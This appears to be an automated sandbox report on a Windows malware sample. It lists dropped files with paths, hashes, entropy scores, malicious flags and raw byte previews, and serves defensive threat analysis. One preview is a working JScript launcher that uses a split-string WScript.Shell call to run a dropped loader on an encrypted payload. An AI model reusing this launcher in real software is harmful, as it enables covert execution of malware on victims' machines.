SHA-512:	B43E426554D0A8EB5A2276116DE360E9461B2A2D5BDA987E7FBAC214D491B0353EA0FD751C8A50CBA1A5C44BDA0D6B099C9EE93F6DBDA982B96BD10162978798
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: c2.hta, Detection: malicious, Browse Filename: c2.hta, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Full-Ver_Setup.exe, Detection: malicious, Browse Filename: random.exe, Detection: malicious, Browse Filename: HouseholdsClicking.exe, Detection: malicious, Browse Filename: DodSussex.exe, Detection: malicious, Browse Filename: DangerousMidlands.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	195
Entropy (8bit):	4.7615351185197845
Encrypted:	false
SSDEEP:	6:RiOnJHonwWDKaJkDHLFkNx5AW9GfwWDKaJkDHLFkNx57:YIQjWaiF+/dG7WaiF+/7
MD5:	9DD76500C74BBB507074A3DA164E755D
SHA1:	72EBC79800AD7A96DCC8923A186D7ECA36561F28
SHA-256:	6801E9D84DF9CAAB43718B737D58E5E3CD3CB614DBAFEB50776630FCD8E6694C
SHA-512:	531E901749A8C5687310E8330A8558384A94C28587AC8B6B3EE362449F2C46B9F27BBF3C162095A030D880E6693E477F62FAB7A2C24F7D89FED0AC0E09A8C494
Malicious:	true
Preview:	new ActiveXObject("W"+"script.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\ConnectWare Technologies Ltd\\LinkHub.com\" \"C:\\Users\\user\\AppData\\Local\\ConnectWare Technologies Ltd\\y\"")

C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
File Type:	data
Category:	dropped
Size (bytes):	702975
Entropy (8bit):	7.9996899596807305
Encrypted:	true
SSDEEP:	12288:7oJEXO+WtgpSKS6G4epnMRNutIPcIyuSvcmeeVURApKFWRR51vR0pGlh7e7:wE++WKUsGqcIyuSkeVURAw2JvRmGlh7c
MD5:	40320097845035E71C88A2796F2F751B
SHA1:	C6002D6BEC7322277FE88154FDE0829C8A8E2762
SHA-256:	62BD76A99BCD9EAE526C4A6D147C02832138A6AA1D38559DB20174F74D806946
SHA-512:	57780D293AE512BBCF53F13AFF29851C9A94A4F7ED1D51654CEDD06A6089D80AAEDCCF68F7CC5D3B37659E77AD3058EC72AE8CCB18BBD7478C5FB06F93776074
Malicious:	false
Preview:	....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h\|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.........,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...\|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{\|.8.L.o;,.V...vC...B.p.X(T%..q..T..z..........M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[..I...?.v.tfJ..9....+..J.....g.....g.WK.....\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\U

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	702975
Entropy (8bit):	7.9996899596807305
Encrypted:	true
SSDEEP:	12288:7oJEXO+WtgpSKS6G4epnMRNutIPcIyuSvcmeeVURApKFWRR51vR0pGlh7e7:wE++WKUsGqcIyuSkeVURAw2JvRmGlh7c
MD5:	40320097845035E71C88A2796F2F751B
SHA1:	C6002D6BEC7322277FE88154FDE0829C8A8E2762
SHA-256:	62BD76A99BCD9EAE526C4A6D147C02832138A6AA1D38559DB20174F74D806946
SHA-512:	57780D293AE512BBCF53F13AFF29851C9A94A4F7ED1D51654CEDD06A6089D80AAEDCCF68F7CC5D3B37659E77AD3058EC72AE8CCB18BBD7478C5FB06F93776074
Malicious:	false
Preview:	....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h\|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.........,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...\|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{\|.8.L.o;,.V...vC...B.p.X(T%..q..T..z..........M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[..I...?.v.tfJ..9....+..J.....g.....g.WK.....\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Approaches

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	Microsoft Cabinet archive data, 488285 bytes, 11 files, at 0x2c +A "Instantly" +A "Dressing", ID 8829, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	488285
Entropy (8bit):	7.998550946105718
Encrypted:	true
SSDEEP:	12288:GtaS7z1F+D7f32HLxjQ8IeOFg8CAINNtUcfgBTG12Zqc:+aS7zqDcLxk8Ie5ZNN6cQqwZqc
MD5:	7A07DED0E02828AA5F3CFBAD5642C558
SHA1:	166EAD6F90D79790E559C7CB19BC2588E6EDBAE1
SHA-256:	2089D963BDAD621F966AC18E371FBF4BDD2E94CFA1841142EDF317E4B971F28B
SHA-512:	9DA78695AC581646ADBA790FBBFEE3E2E26DA4F60C75FCABCF11D30E06054D59C6E3A764B4828EEBC6592E7FE5255BF1778AE1A8877D60E1A45C971B9D2586D6
Malicious:	false
Preview:	MSCF....]s......,...............}"..<........`........'Z.% .Instantly......`....'Z.% .Dressing......x....'Z.% .Measurement..$...\|....'Z.% .Indonesia..@.......'Z.% .Led...........'Z.% .Different...........'Z.% .Missed...........'Z.% .Clinton..\|........'Z.% .Brian..........'Z.% .Protocol..4..]@....'Z.% .Constitute...b..K..CK...\|...0>..,.Y1.......ltA.K$.l.H.....[..>.....'[..n...Zk...>..m..Uw...~..Jb..E..DX>.l d.s..n....y...~.s?.=..{.=..s........[.Fwm.g..\OR..q.l'..>.G...\|..r.s9..p...>..[.B.\....e.99"..ub...x......i(.r.........S2.)..3.8.xXl........o#..YE.(...%...7Z.N.....\|.F.f..l..H.b...KI..1..mm.3.B.V....x.V..{..f..p.Z....V[%.T.....r......^.S@w.#..r...lQ.&b?P..Y.]MN~(.b.Ja........-..1..T.m...\v...v...>.......0...a.K.X.X..ib.I..#q.....K....."...).4...d..F.,....62>.X.e.7....7..i..[.(....[.5..m..Y#"....."~.9xz..S.....j..i.][7NU...2k..__...\|uL.....M..Y..rP..7.....F..Q......B$.O...ZO.]n.U..n..z..;Jj..H...Q...G/K..+c.MEj.l..j....Jl..[l..\|.~.....f..>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Beam

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	67584
Entropy (8bit):	7.997420919125293
Encrypted:	true
SSDEEP:	1536:mPM2IWHYOOcbdpzCNBSD2XTn32zuIcRgk64wnWEi8o:mP5THh5b3+n32zo64Ao
MD5:	18E13DD846278DD017E9BDD8322ACF0E
SHA1:	431DDC2AF8197F887CF7E9B5346792FDBF0F07E3
SHA-256:	4784DDD355896DE73BCCCDB7D0AFD69D6376ADE1F3A22B18BFDA58EB4DFB0744
SHA-512:	005CBE957E2FE900299A82168D0CEB4FF9A89FE82B407103A7DA34BED1C0F12CF22850080D2EB22FAD5A0BAC7813696103BAFCA6735FB31223BEFFF0697CCE2F
Malicious:	false
Preview:	.w..+..h}...X.M....N..h.y.......>...e......pD..{..S....u....8...!.9.....Q.G..rB...d.._..q.~...}8.../.CW.E.`.......c.}..x...M..H..,Mk...N..K......G.>..F.Ru....-....9.Y...q...3$.iN.!.\|.g...n...k..W.i..g..J.L.....P.....F'{6}.i.<,a}..i.....]"......y.yi.+..C..-^j....T.6..j.5..f..&..DN4.$B.i.&..#..K..d......."...."U...r...Qm..V....6....e.....X.vw...I..B<ei....}.>l._,......H.kq.5...........{.QT.Z'.dF[...fkMH$V%....K....y.M..b.G....lv.....>.q..n...-..D7;F~...Ix..AL.5.}......0..9X..w.I...o..\...a.<..a&<...t(.iz.?.N...mx.o...O.b.}5G.~.c.#.....==...O..RY......o..]...G?=.<.;...N.^.E.2.3....=...XC.6..XC.)H<......4.?>\...Ng...C.vHLv<..A..u.p-qs.G)z.8\|.s.<V.._..6.`.^..#.^..._o...4..^h....!"&I...>....b...'.=I(.'e..!..Z..R1;..3A..F/.Jwr.GcX*GO?.t...f^1G...cF..@.iC.U.8.#..$..p......e2....U..j.c....q..V.rL....xf...F..X85.5.L#K.T.s..a.c`......z_.Y..9E.6......>...x2...=.d..`...^.U.p~..n.U.#........S.BY..n/........]..M....1...J8..%.:..l..s.8...\....J...D.y.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Blocked

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	101376
Entropy (8bit):	7.9982174281872025
Encrypted:	true
SSDEEP:	3072:tYj0CGgXe/2IS6hnqS2WONlLUDBt7itJs6g:tYVG4ehSOnMWONlY9t7itJQ
MD5:	99A9AA7C4197C9FA2B465011F162397E
SHA1:	F4501935D473209F9D6312E03E71B65271D709E4
SHA-256:	6196D79DC188E3581F8446637CF77E8E9105000E7A8A8135213F750D9BC65EB0
SHA-512:	03EF41FC61EC810C788252EEDCDC7C2616A55C2CF0996F830DAB1A60982589360CAD7C71B76A199A94DE0337BD068AC1A7A6503CE67CC091BAF1C6C6758B01F5
Malicious:	false
Preview:	4t....d+.R..f[.V....3@.....L?/.'.D.."........I..6..q..AC..CK.W.xjt[.:.....m>..PWV.l......BQ.H.x.xw..,?..S..$.. .. y..........do....R.a..Hn...N.x..I.R.j.1.D..`..L.D.`x4.....`v.. .q...D.b......J.{.6\|..m.......k.!.7.4.Z%.............(...O/.'".A.H..{r(.Z.$.......-......ZXo.ts.r.......i..~Y.w.l..aS....lv.DI?g{'Z..J.Sq.s.......>OB..-.#k.t...M.Y@~x. .C0.h...C.6O...5.K2!0.Z..+.@F.T...{k.U...S....u.n]...M.7S.....[..;.D..o.....t...H.&.c.2.7...%...".&].2....@......Q...YZ.d.P...r\.;...e......b(.....Xc.8...h....k....O..p.i.@$..q..k8....3...:....&@)x.....j....c.k.x.$9,.0..".....v......Q.d..?cW..&mmw.g..U`.....R7..P..^..1.f.Mb......?...^....6.v..P...K...j.`f.I.?..lJ6.F...q..{.}..C......@.L.w....k.Au....@V.x..{l,.%)....>...i.y.b.....5.G[....n....i.G...a.....".A...h.!6+../....P.....L...>".Y.0....q.39.P..!bj...da.#e......-.U....h...mh.+..V.}....<./....F.dw...,.l......j5...B<..30.,...W.m#].F.O..FLP.d..:.....L..~F0e..j.zq..)p(h...R...}p.B

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Brian

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	97280
Entropy (8bit):	5.234350627932401
Encrypted:	false
SSDEEP:	768:Jx/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:JdKaj6iTcPAsAhxjgarB
MD5:	031B6C0EDF7E1DD8ACF9700CC96085D7
SHA1:	0819EC14EBC323A9507E52A0579F6F9BA1589C3D
SHA-256:	7FA45FC5F2F9C52E289D56F5AF6B95427EDC979A838608DC20CB4D89C7078553
SHA-512:	75577FEEB70AF3025A021FB8DD3FC52B56AC9EC7CE7B0BB24E2970CA3626A0B96984ADB7874AE5608C9A739BC46E5C2207C98B2CB0C40925B2D95B7A2969A7BA
Malicious:	false
Preview:	?.?.?.?.?.?.?.?.?.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.r.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.A.A.A.A.A.A.A.A.A.A.r.r.r.r.r.r.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.r.r.r.r.r.r.r.r.r.r.r.C.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Clinton

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	4.910075425726921
Encrypted:	false
SSDEEP:	768:FOWel3EYr8qcDP8WBosd0bHazf0Tye4Ur2+3:F5el3EYrDWyu0uZo2+3
MD5:	2BC25537976C2E146EBED51446CE7B59
SHA1:	0EBD76401729D4F1B9B4DCAB1586D96CD410A1D2
SHA-256:	F01BA73C4332997F031434DDA3EBBFE03EE70F9BE65275ABEEDE452E148B94E7
SHA-512:	7BA4AEA3D8836216CDFB4B27EC7AF041BF9EDB5A0DEA8BEECE8C7950BC9BC793B12F7E7C1A0B4EA6E0194A1211CACBFB06204E68689E0DA3E895BE8518572A80
Malicious:	false
Preview:	................................................................................PST.............................................................PDT............................................................. .L.`.L.....................................`.y.!...............................@~............. ...............................@.............. ...............................A.................[.........................@~......Q...Q.^. ._.j.2.........................1~........................................................................................................ .............................................................................................................................................................................................................abcdefghijklmnopqrstuvwxyz......ABCDEFGHIJKLMNOPQRSTUVWXYZ.............................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cocks

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	7.997164994069138
Encrypted:	true
SSDEEP:	1536:bdM1aIyizRac/AX9Cslc7g63p8ueagJNvZoNoWRY6Du/FI84:ZVIyQ/o91658ueaa2PS/FIj
MD5:	990ABD973C6DDB75837EEB5B21F59AE1
SHA1:	85846C0CE7CD3314DEC32E3BED99511A59B6500A
SHA-256:	29B9FA04343B577FFB55491F820A6D1978230072AE4752AD42836CF0581CD5E2
SHA-512:	179561473340EB92A5BCAFE243217D9C8158572239294DDF45CB0FBDEF0EBAE1B07863C631CE7BFB983F65F627268300812EB38AAABCBA3CFF90F5D014C06754
Malicious:	false
Preview:	.Zhz.&..N.......B.z..si.....u...4A[.F.A.$...O..Y....]..3&M.p%.?.>Z..O.q..$X...KuS.a.C.....(J..#.f...k.c...0..o0.L..,..2k.Lc.x."........0...X...Q..Ix...Ep...yw..1...V.~........h\pK3m ........(h..\|.gp....@..:.O.K.....(...v..s.{.{..wz..].fh..j.8}}..F95..T...pX.............)j?.....%.Q"....{.#}..,dz......]d%..... .K..z#..{C.B......Z.....j{.u;..Yhl...[...T.80.y<dc.2IHG..8......1..x.....pF.%. ....f5>.CT7.}.."....<...4E.k.m.......o.....\G.y.WK[\|.."}...E...../.$.......d.\|..X.-^.d.F"..".W..(..<.........HQ............M!c......?Z32.>.$.._.yR...\.-.=O.p.x...y.z.E...._.a/6..Q...3...QG..P.kQ2...FU.!$.)..ve.......N...B..j.{..`...Q.t ..;.\.J!O F.3..o1U....*.4gJ.U.N....x.I 9C3..V....Z.../..u.",.J.q..Q'l.o...h ....V>m...d..._.d...V..-.H..H..Pw....M...b.-9...cgV.b..._...D.a....x.V....y^..Yaq...#......-"q....0v7.dB....T.!.........d,.)u.....Y...P^.p....]sX.(."..A.ky1..SFK..G..G^.p..#.8c.q.....~....{.d..b......l..o...Q......l..G.g.t9}....Q....`...KX.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Constitute

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	144384
Entropy (8bit):	6.494296209067955
Encrypted:	false
SSDEEP:	3072:5dgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQw:LgQaE/loUDtf0accB3gBmmLsiS+w
MD5:	57BB8B206C43DDE57D7066A4DEDB272C
SHA1:	E3B400206A6D3C7C5885CB56BFCAB82220BB110A
SHA-256:	821735E47ECA9D213B65D12878DCA3D3EC620B5FE0555F0BD3B73EEE459A6D4F
SHA-512:	C5E0C68E27CFC9705178C261FC617EAC27D745CDF93F88D01A49D3025AD7025038FB8DB5FA36D96089D4410BB965E9163282A99A0D6EAE40ED6783AF6C5BD074
Malicious:	false
Preview:	..F...................E....;E...MN..;...EN.........H......T...$.PA........x...........U...E.....M...E.....;E...NK..;...FK.........[.......v.......[..h.........O.......W....O...............................O...7...........%....v..0...Hj....~.............F..F.@....#O........3.F...............Q.w....N.....E...M....Q.6P.s....M...............G..X........[............S........S............S........R.......w....R........R.......d............v..........R...7...........F............_^3.[..]........BN.......W...<N...........=.....................2.....F........H..........$.xA....c.......Z...;...\|....N......u........P..................S.......A..$..A......V.......1....7........u...S...l....q...........h....$..A....N...V...]....M...H..........$..A.....f...s..].....f...C.j..v..6.p..0.j.......................................+..M......+....M..E....u....;...AJ..;...9J...}....T......Vf...v....Lf...C.j..v..6.p..0........'........Q......F..........Q......F.........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\David

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	56320
Entropy (8bit):	7.996610067500435
Encrypted:	true
SSDEEP:	1536:Uq7NUVrVpkmRwRjr3psvmpMfmPO6rpciGjMzjM:UKNUVrkRRGm1PO6mj4M
MD5:	583A66DF71B30CE556F3F5131162AA1C
SHA1:	0594EF5DF9510410B520282D9C833D604969865A
SHA-256:	83A055C80F22D870C163A6ABC49664C8A9F8D14CB9CDB11DFBCB70AD72191D4C
SHA-512:	3939472BA5061896D4F8E0F1F97ED34B52D32F5D27DA41FC5C92EF73653482102349AF607F327B15B13FD208C970B95DBB3B714332FF1D58CFDFF25C0C1C4C3A
Malicious:	false
Preview:	J.....9.b......h....=<.5}.^U....}./.L.k6nz....Q..7z3.c..... 2..b8..c.a...C.....2y.(.0..-...S....8....o,.T.&.c..G. .....q.B..Sf..........M....m.A\|..S.N.:....?0R....$:...........q.q.!.F....T..h.....d.s...fR.+\1.[+o.;u..u..{g<.......4.f..w..-..._.Q....yT.<L..h.G.j...._@.9c;sT.....<...-k.1..NW....1q..?.KZ...u.........{?....?..pl.-...\|..O,f)q.oZ.=....G..2..5,q.\.......H%..+......N..Z...h.......t.{.m..6.d....3.Y..9........w...e.\";.;.!...S..[...........t.;..Ek.c_`....+."...Q._?[.1 ..d...]....6..Y.v.qh...Ss!...v.$..H........f.....?.a.\..R.-.w....b.1..g..yJL...)...AJ.>JYl:.[m....{^...<.G..M.4A.W...J..yd.Y..s....V..V.p..d...r..`....p..S.@.p..c.M....."D~.J.C.].R...j......J..F.o.s#...Nq..V...`..t/........v.p2B.Z*6....=.A...4S,...R.e...F.6..e.Q.y.>..O...e.%..~....tj....\|.e.$.j9%.[[..x9w.G..g.`.....^.p.I.f......k.4....%..9....nnz...3_fy..\|..a..@6.C.,.P.....V...d..P..Fn.. ...B....Zs....inB<...&..5c....B...w)S.....E@2..%....b.l-.l

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Different

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	6.548010857173451
Encrypted:	false
SSDEEP:	1536:V1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdz:VZg5PXPeiR6MKkjGWoUlJU5
MD5:	56BB83409EE3E1A9DDF64E5364CBAAF6
SHA1:	C3DA7B105A8C389BE6381804CB96BB0461476E39
SHA-256:	D76B1AAACC225CD854E0EC33C5268C02824EE4A1120B5217916C24D23E249696
SHA-512:	59D1D8C1C613F89CBAA8B5C242CEA4889BA8F8B423D66598C5ED3A26FD82752A9CA0742C1ED932B3A1FBEDB5B8701AB6321C35E9DDE5A801625350CFF7990AC6
Malicious:	false
Preview:	U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F\|U............[............u......3........................l.....p.....t.....x.....\|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dressing

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	137216
Entropy (8bit):	6.481339286025911
Encrypted:	false
SSDEEP:	3072:npIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTqI:IphfhnvO5bLezWWt/Dd314V14ZgP08
MD5:	1CB233987779B587705687B7D8F66A01
SHA1:	5F33D543C24701D370072BB4E77E4A8D058AE035
SHA-256:	48A4A6FD51F6F62D3E814BCF14891ACE7D7813C90BE50D6B133FBEFF21B9E137
SHA-512:	56DF98EC38109FB121D69D84140EFFC81F0EEF25BFB48C25D23EF5C45C274A5DC4015DBFDB63616530F804896B9F19788AAE60BFCCBC43292F113E2EC82350F6
Malicious:	false
Preview:	.j.....I......u0..$.I....Q..\|....L..t..I8.A..\|....D..t..@8.@...j..E.PW....I....u:..$.I....Q..\|....L..t..I8.A..\|....D..t..@8W.@....(.I..X....u.W....I...t8..$.I....Q..\|....L..t..I8.A..\|....D..t..@8W.@....(.I.....u.........F......>_^3.[....U...$VW...M..&....E..@..0....p...N..U.......u.....I...u=..$.I....Q..\|:...L:.t..I8.A..\|:...D:.t..@8.M.h..I..@....M...L.@.j..0.E.P.L.......u.....I.P.M......M.......U.M.......M..E.P.\...M.......M......_3.^....U...0...SVW.}...G........W...]..J......M...h..I..9M.....u....H..\|1...D1.t..@8.H...\|1...D1.t..@8.@...!...j...t...........PS.............G.P.V...YP.M...#...].j.WS.u.....I..............tw.E..x..r..@..H..+.....uIS..;..q..Y;.u:S.M...#...M......U.M.......M..E.P.}[...M......M......V.M.WSW....P.........@..j.j..H....[......$.I....I..\|1...T1.t..R8.B..\|1...D1.t..@8.@...E..(.u.j.P.(...S.i......_^3.[....U..SV.u...W.F....Q....V....J.......N...I..o...j.PRW....I..u......3....F........u3.&...$.I....I..\|....T..t..R8.B..\|....D..t..@8.@.....>_^3.[]...U

